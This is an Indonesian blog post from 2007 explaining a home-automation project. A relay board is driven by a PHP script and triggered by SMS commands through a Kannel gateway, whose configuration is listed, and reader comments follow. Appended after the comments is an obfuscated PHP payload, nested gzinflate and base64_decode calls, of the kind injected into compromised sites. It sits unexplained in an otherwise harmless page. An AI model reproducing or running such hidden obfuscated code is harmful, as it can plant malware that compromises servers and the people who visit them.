Delicious

Archives

Categories

Intisari….

  ozzie / 30/09/2007


Judulnya kyk minuman yang ada kadar alkoholnya ;));))

Menanggapi respon dan tanggapan dari temen-temen mengenai 2 project iseng-iseng menjelang mudik yang saling berhubungan:D

Okeh;).. sayah akan coba jelasin sistemnya:D.. Project ini terdiri dari 2 pc; yang masing sebagai Controller dan sms-gateway <:-p (kenapa gak jadi 1 pc ajah?? :-??… )

PC-1 ( Controller )

PC ini memiliki prosesor 133MHz 8-} dan sebuah PPI8255 pada base address 0×300. pada kernel 2.4.18-14 (INFO, dmesg & lsmod )
PC-1
Output dari PPI8255 yang terdiri dari 3 Port yang berupa 1 buah connector DB-25 langsung nyambung ke 3 buah RELAY BOARD (karena masing-masing module relay board hanya terdiri dari 8 relay)
RelayBoard
yang nantinya Relay Board terhubung ke Rumah Kabel di Gudang / Loteng (LAB C 8-}8-} )
Gudang Rumah Ozzie
Misal: Port A (relay board 1)

  • Relay-1 = yang ngatur Lampu Jalan
  • Relay-2 = yang ngatur Mesin Air
  • Relay-3 = yang ngatur lampu Teras

Dan Seterusnya hingga 16 Relay (Port A & B). ;));)) karena 1 Port (Port C) dipakai sebagai INPUT ;)
Misal: Port C (relay board 3).

  • Relay-1 = switch di pintu gerbang apabila belum tertutup / rapat pintunya
  • Relay-2 = switch di jendela
  • dan seterusnya

Okeh;) sampai sini penjelasannya!.
selain itu mesin ini (PC-1) memiliki web-server (Apache & PHP) sebagain penghubung ke Shell berbasis PHP:D
PHP
yang nantinya untuk meng-eksekusi Port A ke 2 cukup panggil:

http://192.168.0.1/go.php?port=A&io=2

dan port A ke 5:

http://192.168.0.1/go.php?port=A&io=5

dan seterusnya ;)

PC-2 (SMS-Gateway)

PC ini (PC-2) memiliki sebuah modem PCMCIA (Vodafone Mobile Connect Card 3G/GPRS) yang berfungsi sebagai GSM-modem guna mendukung SMS-Gateway ber-Engine Kannel
SMS-Gateway
SMS-Gateway

Referensi SMS-service atau informasi cara kerja SMS-Gateway

inih isi kannel.conf milik akyu:">:">:">

group = core
admin-port = 13000
admin-password = xxxxx
smsbox-port = 13001
log-file = “/opt/sms/logs/kannel.log”
log-level = 1

group = smsc
smsc = at
smsc-id = vodafone
modemtype = vodafone
device = /dev/modem
sms-center = +62855000000
speed = 115200
keepalive = 0
sim-buffering = false

group = smsbox
bearerbox-host = localhost
sendsms-port = 13013
global-sender = 13013
log-file = “/var/log/smsbox.log”

group = sendsms-user
username = xxxxx
password = xxxxx
#user-allow-ip = “127.0.0.1″

group = sms-service
keyword = default
text = “BOSS!!!.. Salah nulis Perintah!!! ketik INFO kirim ke nomor ini.”

group = sms-service
keyword = INFO
text = “Perintah yang Tersedia: PORT, HELP”

group = sms-service
keyword = HELP
text = “KETIK: PORT< spasi >portnya:A/B/C< spasi > NO-Relay”

group = sms-service
keyword = PORT
get-url = “http://192.168.0.1/go.php?port=%k&io=%S”
max-message = 3

group = modems
id = vodafone
speed = 115200
name = VodaFone3G
detect-string = “GlobeTrotter”
init-string = “AT+CNMI=1,2,0,0,0″

atau bisa lihat di Sample
Penjelasannya :D:
jadi;)).. kalo kirim sms dengan parameter yang salah akan dibalas sms oleh mesin dengan pesan “BOSS!!!.. Salah nulis Perintah!!! ketik INFO kirim ke nomor ini.;));))

lalu kalo ngirim dengan isi pesan INFO.. akan di bales oleh mesin “Perintah yang Tersedia: PORT, HELP;))

lalu kalo ngirim dengan isi pesan HELP.. akan di bales oleh mesin “KETIK: PORT< spasi >portnya:A/B/C< spasi > NO-Relay;))

hingga akhirnya: si BOSS!! 8-}8-} kirim pesan dengan isi “PORT A 2” yang diteruskan oleh SMS-GATEWAY untuk meng-EKSEKUSI “http://192.168.0.1/go.php?port=A&io=2 yang ada pada PC-1 (Controller).

ATAU: ketika si boss ingin menyalakan lampu jalan.. maka si boss cukup kirim SMS dengan isi “PORT A 1” ke nomer di rumah. <:-p<:-p karena “PORT A 1” akan diteruskan oleh SMS-GATEWAY untuk meng-EKSEKUSI “http://192.168.0.1/go.php?port=A&io=1 yang ada pada PC-1. dan PC-1 akan melanjutkan untuk menyalakan Relay ke 1 pada relayboard 1 (Port A) pada Rumah Kabel di Gudang. dan sebagaimana fungsinya, maka relay akan menghubungkan arus guna menyalakan Lampu Jalan! :D

#:-s#:-s#:-s sayah rasa cukup penjelasannya :D

mengenai WAP-MRTG :-? itu hanya meng-convert png menjadi wbmp ;) :-?:-? berhubung di rumah banyak serper yg nyala:D jadi kudu di monitoring;) nah nanti pas mudik bakalan di tinggalin tuh rumah:D jadi monitoringnya liwat HP ajah \:d/\:d/
sebenernya liwat Opera Mini juga bisa:"> cuman boros pulsa dan grafiknya pun kecil-kecil 8-}. jadi.. berhubung ada WAP kenapah gak di manpaatkan :>:> tapi percuma juga yak?? :-s:-s…. wong di PDA udah bisa browsing, telnet, ssh 8-}8-}

Moga-moga inih bisa memotivasi dan meng-inspirasi-kan temen-temen dalam berkarya ;));)) Amiiinnnnn[-o<[-o<


« »


10 Responses to “Intisari….”

  1. irul Says:

    Waaahhhh… :-O :-O rezeki nich… =P~ =P~ =P~ Thankz om… =D>

  2. KieN Says:

    euleuh” … mantep Om ilmunya … nuhun atuh om :D

  3. achie Says:

    wadoooh om… ntu apaan sih ?? sayah bisa asal pencet ngga?? …;))

  4. cenos Says:

    gw ga bisa bilang lagi dah..
    hebaaat euuuy…….. =D>
    salut dah buat ozzie…
    ga kebayang dah

    blh donk niyh, kapan2 ajarin gw… ;))
    sukses terus zzie……..
    jangan lupa kuliahnya, dah kelar blum zzie,…
    klo blum, jitak aja pak yoga… ;))

  5. MOJO Says:

    Hebat…hebat..hebat….masih kurang….?
    Hebat…hebat…hebat…Salut gue ama lo….
    Tar kapan-kapankita bahas Aplikasi SMS yg lain…kaya seperti Forwarding Command…jadi kalo ketik BOKEP Judul Film …
    Aplikasi lo bisa kasih Link WAP buat download itu judul filmnya…
    Ha…ha.ha….

  6. boby Says:

    mas mo tanya, perintah at command kirim sms dengan menggunakan port tertentu(*bukan port pada komputer melain kan port di sms operatr) default sms portnya 0, sedangkan kita ingin mengubahnya menjadi misal 30. saya ingin mencoba membuat sms gateway menggunakan port tertentu. karena hp saya support java yang bisa dibikin program kirim sms yang di encrypt dan menggunakan port tertentu.nah yang bingung bisa nggak AT command menerima atau mengirim sms dengan port yg di tentukan itu.. makasih

  7. muhazir Says:

    mas! saya pemula, boleh ga ya… minta tutorial yg lengkap

  8. muhazir Says:

    mas! saya pemula, boleh ga ya… minta tutorial yg lengkap

    IndoDesain.org

  9. dedi Says:

    numpang nannya niehh.
    ak juga pake kannel 1.4.1 ma php
    ko tiap da sms yang masuk balasan dari kannelnya berupa empety service from frovider
    yang masalah dimana, kannel to php nya..
    makasih atas waktunya

  10. renaopm Says:

    mantep nih, ane br beberapa hr ni bca web si om,,
    nice om,, maju teyuss


".gzinflate(base64_decode(gzinflate(base64_decode(gzinflate(base64_decode('BcHRdkMwAADQD/KgS0mzR8ShjSMJNWveEEamOGljab9+9+KOSbyef5IA89DREZ+phxlyKhQ2sF/pt2hxFtPHwFYI4J1+mVr7YRsVICLl0fQMYyzzvW8FIOGbX1PVUVAP0/uWuZs8RWoEcMl8XpKEe37FrPxw/eeNGNw19npJt8S5uOlh83I2wUDpI6btM7hPv0s8Idtwt7XVp6gqMz92VSRz6Zx7WFuuSb8YAk8IveQfQ69xi7kGBRCNSsZSDPl+CP4B'))))))); ?>